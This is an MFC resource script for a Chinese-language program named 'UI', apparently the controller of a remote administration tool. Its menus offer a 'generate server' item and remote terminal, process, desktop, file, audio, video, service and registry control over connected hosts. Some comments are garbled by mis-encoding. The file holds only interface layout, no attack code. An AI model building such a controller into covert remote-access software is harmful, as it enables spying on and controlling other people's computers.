// Microsoft Visual C++ generated resource script.
//
#pragma code_page(65001)

#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#ifndef APSTUDIO_INVOKED
#include "targetver.h"
#endif
#include "afxres.h"
#include "verrsrc.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// 中文(简体，中国) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#ifndef APSTUDIO_INVOKED\r\n"
    "#include ""targetver.h""\r\n"
    "#endif\r\n"
    "#include ""afxres.h""\r\n"
    "#include ""verrsrc.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "#define _AFX_NO_SPLITTER_RESOURCES\r\n"
    "#define _AFX_NO_OLE_RESOURCES\r\n"
    "#define _AFX_NO_TRACKER_RESOURCES\r\n"
    "#define _AFX_NO_PROPERTY_RESOURCES\r\n"
    "\r\n"
    "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)\r\n"
    "LANGUAGE 4, 2\r\n"
    "#include ""res\\UI.rc2""  // 闂?Microsoft Visual C++ 缂傚倸鍊归悧鐐垫椤愶附鍎嶉柛鏇ㄥ枤閵堫偅绻?\n"
    "#include ""l.CHS\\afxres.rc""      // 闂佸搫绉村ú銈夊闯椤栨粎纾奸柛鏇ㄤ簼椤?\n"
    "#if !defined(_AFXDLL)\r\n"
    "#include ""l.CHS\\afxribbon.rc""   // MFC 闂佸憡姊婚崰鏇㈠礂濮椻偓瀹曠娀宕崟顒€顏梺纭呯焽閸愩劎鍘梺鍝勵棥閵堝洢鍋掑┑?\n"
    "#endif\r\n"
    "#endif\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Icon
//

// Icon with lowest ID value placed first to ensure application icon
// remains consistent on all systems.
IDR_MAINFRAME           ICON                    "res\\UI.ico"

IDI_CMDSHELL            ICON                    "res\\cmdshell.ico"

IDI_SYSTEM              ICON                    "res\\system.ico"


/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_ABOUTBOX DIALOGEX 0, 0, 170, 62
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "关于 UI"
FONT 9, "MS Shell Dlg", 0, 0, 0x1
BEGIN
    ICON            IDR_MAINFRAME,IDC_STATIC,14,14,21,20
    LTEXT           "UI，版本 1.0",IDC_STATIC,42,14,114,8,SS_NOPREFIX
    LTEXT           "版权所有 (C) 2019",IDC_STATIC,42,26,114,8
    DEFPUSHBUTTON   "确定",IDOK,113,41,50,14,WS_GROUP
END

IDD_UI_DIALOG DIALOGEX 0, 0, 320, 200
STYLE DS_SETFONT | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
EXSTYLE WS_EX_APPWINDOW
FONT 9, "MS Shell Dlg", 0, 0, 0x1
BEGIN
    CONTROL         "",IDC_LIST_ONLINE,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,46,306,50
    CONTROL         "",IDC_LIST_EVENT_LOG,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,118,306,50
END

IDD_MAIN_SETTING DIALOGEX 0, 0, 255, 133
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "参数设置"
FONT 9, "MS Shell Dlg", 0, 0, 0x0
BEGIN
    DEFPUSHBUTTON   "确定",IDOK,30,91,50,14
    PUSHBUTTON      "取消",IDCANCEL,139,92,50,14
    LTEXT           "监听端口",IDC_STATIC,38,22,28,8
    LTEXT           "最大连接数",IDC_STATIC,39,53,35,8
    EDITTEXT        IDC_EDIT_PORT,85,19,53,14,ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_MAXCONNECTION,85,52,53,14,ES_AUTOHSCROLL
END

IDD_DIALOG_SHELL DIALOGEX 0, 0, 615, 349
STYLE DS_SETFONT | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "Dialog"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_EDIT_SHELL,7,7,601,335,ES_MULTILINE | ES_AUTOHSCROLL | WS_VSCROLL
END

IDD_DIALOG_PROCESS DIALOGEX 0, 0, 421, 352
STYLE DS_SETFONT | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "进程列表"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_LIST_PROCESS,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,7,406,88
END

IDD_DIALOG_WINDOW DIALOGEX 0, 0, 403, 328
STYLE DS_SETFONT | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "窗口管理"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_LIST_WINDOW,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,7,7,389,314
END


/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 1,0,0,1
 PRODUCTVERSION 1,0,0,1
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x1L
#else
 FILEFLAGS 0x0L
#endif
 FILEOS 0x40004L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "080404B0"
        BEGIN
            VALUE "CompanyName", "TODO: <公司名>"
            VALUE "FileDescription", "UI"
            VALUE "FileVersion", "1.0.0.1"
            VALUE "InternalName", "UI.exe"
            VALUE "LegalCopyright", "TODO:  (C) <公司名>。  保留所有权利。"
            VALUE "OriginalFilename", "UI.exe"
            VALUE "ProductName", "TODO: <产品名>"
            VALUE "ProductVersion", "1.0.0.1"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x804, 1200
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO
BEGIN
    IDD_ABOUTBOX, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 163
        TOPMARGIN, 7
        BOTTOMMARGIN, 55
    END

    IDD_UI_DIALOG, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 313
        TOPMARGIN, 7
        BOTTOMMARGIN, 193
    END

    IDD_MAIN_SETTING, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 248
        TOPMARGIN, 7
        BOTTOMMARGIN, 126
    END

    IDD_DIALOG_SHELL, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 608
        TOPMARGIN, 7
        BOTTOMMARGIN, 342
    END

    IDD_DIALOG_PROCESS, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 414
        TOPMARGIN, 7
        BOTTOMMARGIN, 345
    END

    IDD_DIALOG_WINDOW, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 396
        TOPMARGIN, 7
        BOTTOMMARGIN, 321
    END
END
#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Menu
//

IDR_MAIN_MENU MENU
BEGIN
    POPUP "文件"
    BEGIN
        MENUITEM "退出",                          ID_MIAN_CLOSE
    END
    POPUP "设置"
    BEGIN
        MENUITEM "参数设置",                        ID_MAIN_SETTING
        MENUITEM "生成服务端",                       ID_MAIN_CREATE_SERVER
    END
    POPUP "帮助"
    BEGIN
        MENUITEM "关于",                          ID_MAIN_ABOUT
    END
END

IDR_MENU_NOTIFY MENU
BEGIN
    POPUP "托盘"
    BEGIN
        MENUITEM "显示",                          ID_NOTIFY_SHOW
        MENUITEM "退出",                          ID_NOTIFY_EXIT
    END
END

IDR_MENU_LBUTTON MENU
BEGIN
    POPUP "点击鼠标右键"
    BEGIN
        MENUITEM "终端管理",                        ID_ONLINE_CMD
        MENUITEM "进程管理",                        ID_ONLINE_PROCESS
        MENUITEM "窗口管理",                        ID_ONLINE_WINDOWS
        MENUITEM "桌面管理",                        IDM_DESKTOP
        MENUITEM "文件管理",                        IDM_FILE
        MENUITEM "语音管理",                        IDM_AUDIO
        MENUITEM "视频管理",                        IDM_VIDEO
        MENUITEM "服务管理",                        IDM_SERVICE
        MENUITEM "注册表管理",                       IDM_REGISTRY
        MENUITEM "断开连接",                        IDM_CLOSE_CONNECT
    END
END

IDR_PSLIST MENU
BEGIN
    POPUP "PSLIST"
    BEGIN
        MENUITEM "结束",                          ID_PSLIST_KILL
        MENUITEM "刷新",                          ID_PSLIST_REFLESH
    END
END

IDR_WSLIST MENU
BEGIN
    POPUP "WSLIST"
    BEGIN
        MENUITEM "刷新",                          ID_WSLIST_REFRESH
        MENUITEM SEPARATOR
        MENUITEM "关闭",                          ID_WSLIST_CLOSE
        MENUITEM "隐藏",                          ID_WSLIST_HIDE
        MENUITEM "还原",                          ID_WSLIST_RETURN
        MENUITEM SEPARATOR
        MENUITEM "最大化",                         ID_WSLIST_MAX
        MENUITEM "最小化",                         ID_WSLIST_MIN
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// Toolbar
//

IDR_TOOLBAR_MAIN TOOLBAR 48, 48
BEGIN
    BUTTON      ID_ONLINE_CMD
    BUTTON      ID_ONLINE_PROCESS
    BUTTON      ID_ONLINE_WINDOWS
    BUTTON      ID_ONLINE_DESKTOP
    BUTTON      ID_ONLINE_FILE
    BUTTON      ID_ONLINE_AUDIO
    BUTTON      ID_ONLINE_VIDEO
    BUTTON      ID_ONLINE_SERVICE
    BUTTON      ID_ONLINE_REGISTRY
    SEPARATOR
    BUTTON      ID_MAIN_SETTING
    BUTTON      ID_MAIN_CREATE_SERVER
    BUTTON      ID_MAIN_ABOUT
END


/////////////////////////////////////////////////////////////////////////////
//
// Bitmap
//

IDR_TOOLBAR_MAIN        BITMAP                  "res\\MainToolBar.bmp"

IDB_BITMAP_MAIN_TOOLBAR BITMAP                  "res\\ToolBar_Main.bmp"


/////////////////////////////////////////////////////////////////////////////
//
// AFX_DIALOG_LAYOUT
//

IDD_UI_DIALOG AFX_DIALOG_LAYOUT
BEGIN
    0
END

IDD_MAIN_SETTING AFX_DIALOG_LAYOUT
BEGIN
    0
END

IDD_DIALOG_SHELL AFX_DIALOG_LAYOUT
BEGIN
    0
END

IDD_DIALOG_PROCESS AFX_DIALOG_LAYOUT
BEGIN
    0
END

IDD_DIALOG_WINDOW AFX_DIALOG_LAYOUT
BEGIN
    0
END


/////////////////////////////////////////////////////////////////////////////
//
// String Table
//

STRINGTABLE
BEGIN
    IDS_ABOUTBOX            "关于 UI(&A)..."
    IDR_STATUSBAR_STRING    "就绪"
END

#endif    // 中文(简体，中国) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
#define _AFX_NO_SPLITTER_RESOURCES
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
LANGUAGE 4, 2
#include "res\UI.rc2"  // 闂?Microsoft Visual C++ 缂傚倸鍊归悧鐐垫椤愶附鍎嶉柛鏇ㄥ枤閵堫偅绻?
#include "l.CHS\afxres.rc"      // 闂佸搫绉村ú銈夊闯椤栨粎纾奸柛鏇ㄤ簼椤?
#if !defined(_AFXDLL)
#include "l.CHS\afxribbon.rc"   // MFC 闂佸憡姊婚崰鏇㈠礂濮椻偓瀹曠娀宕崟顒€顏梺纭呯焽閸愩劎鍘梺鍝勵棥閵堝洢鍋掑┑?
#endif
#endif

/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

